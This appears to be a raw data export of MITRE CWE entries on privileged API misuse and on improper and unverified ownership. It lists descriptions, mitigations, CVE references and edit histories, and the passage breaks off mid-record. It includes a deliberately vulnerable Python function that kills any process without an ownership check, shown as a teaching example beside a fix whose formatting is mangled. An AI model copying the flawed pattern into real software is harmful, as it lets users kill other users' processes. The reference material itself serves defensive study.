The product does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly.
|
When a product contains certain functions that perform operations requiring an elevated level of privilege, the caller of a privileged API must be careful to:
- ensure that assumptions made by the APIs are valid, such as validity of arguments
- account for known weaknesses in the design/implementation of the API
- call the API from a safe context
If the caller of the API does not follow these requirements, then it may allow a malicious user or process to elevate their privilege, hijack the process, or steal sensitive data.
For instance, it is important to know if privileged APIs do not shed their privileges before returning to the caller or if the privileged function might make certain assumptions about the data, context or state information passed to it by the caller. It is important to always know when and how privileged APIs can be called in order to ensure that their elevated level of privilege cannot be exploited.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "An attacker may be able to elevate privileges.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": "An attacker may be able to obtain sensitive information.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": "An attacker may be able to execute code.",
"Scope": [
"Integrity",
"Confidentiality",
"Availability"
]
}
] |
[
{
"Description": "Before calling privileged APIs, always ensure that the assumptions made by the privileged code hold true prior to making the call.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Know architecture and implementation weaknesses of the privileged APIs and make sure to account for these weaknesses before calling the privileged APIs to ensure that they can be called safely.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "If privileged APIs make certain assumptions about data, context or state validity that are passed by the caller, the calling code must ensure that these assumptions have been validated prior to making the call.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "If privileged APIs do not shed their privilege prior to returning to the calling code, then calling code needs to shed these privileges immediately and safely right after the call to the privileged APIs. In particular, the calling code needs to ensure that a privileged thread of execution will never be returned to the user or made available to user-controlled processes.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Only call privileged APIs from safe, consistent and expected state.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Ensure that a failure or an error will not leave a system in a state where privileges are not properly shed and privilege escalation is possible (i.e. fail securely with regards to handling of privileges).",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "A Unix utility that displays online help files, if installed setuid, could allow a local attacker to gain privileges when a particular file-opening function is called.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2003-0645",
"Reference": "CVE-2003-0645"
}
] | null | null |
[
"107",
"234"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2008-01-30",
"SubmissionName": "Evgeny Lebanidze",
"SubmissionOrganization": "Cigital",
"SubmissionReleaseDate": "2008-01-30",
"SubmissionVersion": "Draft 8",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Potential_Mitigations",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name, Related_Attack_Patterns",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2010-04-05",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Potential_Mitigations",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Use of Privileged APIs",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null |
Low
| null | 1
|
[
[
"284",
"269",
"648"
]
] |
[] |
282
|
Improper Ownership Management
|
Class
|
Simple
|
Draft
|
The product assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
}
] |
[
{
"Description": "Program runs setuid root but relies on a configuration file owned by a non-root user.",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-1125",
"Reference": "CVE-1999-1125"
}
] |
[
"File or Directory"
] |
[
{
"EntryID": null,
"EntryName": "Ownership errors",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] |
[
"17",
"35"
] | null |
[
{
"Note": "The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Ownership Issues",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This function is part of a privileged program that takes input from users with potentially lower privileges.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdef killProcess(processID):\n\t\tos.kill(processID, signal.SIGKILL)\n```",
"IntroText": null,
"Language": "Python",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "This function remedies the problem by checking the owner of the process before killing it:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdef killProcess(processID):\n\t\t\tuser = getCurrentUser()\n```\n#Check process owner against requesting user* \n\t\t\tif getProcessOwner(processID) == user:\n\t\t\t```\n\t\t\t\tos.kill(processID, signal.SIGKILL)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tprint(\"You cannot kill a process you don't own\")\n\t\t\t\treturn\n```",
"IntroText": null,
"Language": "Python",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"282"
]
] |
[
"283",
"708"
] |
283
|
Unverified Ownership
|
Base
|
Simple
|
Draft
|
The product does not properly verify that a critical resource is owned by the proper entity.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "An attacker could gain unauthorized access to system resources.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-49",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Program does not verify the owner of a UNIX socket that is used for sending a password.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0178",
"Reference": "CVE-2001-0178"
},
{
"Description": "Owner of special device not checked, allowing root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2012",
"Reference": "CVE-2004-2012"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Unverified Ownership",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null |
[
{
"Note": "This overlaps insufficient comparison, verification errors, permissions, and privileges.",
"Type": "Relationship"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
